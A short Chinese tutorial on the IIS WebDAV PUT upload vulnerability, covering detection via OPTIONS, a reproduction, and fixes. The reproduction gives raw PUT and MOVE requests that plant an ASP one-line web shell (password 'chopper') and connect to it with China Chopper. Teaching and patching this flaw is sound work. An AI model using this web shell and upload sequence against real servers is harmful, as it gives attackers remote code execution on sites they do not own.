IIS put上传漏洞
IIS是windows系统自带的web中间件 通过它可以搭建网站
不满足现有功能 开发了WebDAV用于拓展HTTP方法
导致HTTP支持PUT相关方法,导致IIS上传漏洞 用户可以向指定目录上传任意文件
IIS Put 上传漏洞前提 :1,IIS开启WebDAV
2. IIS用户对上传目录具有写权限
漏洞检测
使用HTTP协议中的OPTIONS请求方法
会在返回的 Allow 消息头中,包含 PUT,MOVE,COPY 可能存在IIS PUT上传漏洞
复现漏洞
1.上传(使用PUT方法 上传文本文件 1.txt)
脚本到网站目录下
PUT /1.txt HTTP/1.1
Host: 192.168.1.1
Content-length: 27
<%eval request("chopper")$>
//chopper是密码
2.更改后缀(使用copy或者move方法 将上传好的文本文件复制到cmd.asp 中 然后使用中国菜刀连接)
MOVE /1.txt HTTP/1.1
Host: 192.168.1.1
Destionation: http://192.168.1.1/cmd.asp
3.打开菜刀
单击右键 添加
地址:http://192.168.1.1/cmd.asp 密码 chopper
修补漏洞
1.关闭WebDVA
2,设置ISAPI筛选器Urlscan 取消对PUT方法的支持
3,设置站点目录权限,是的IIS用户不具有写入权限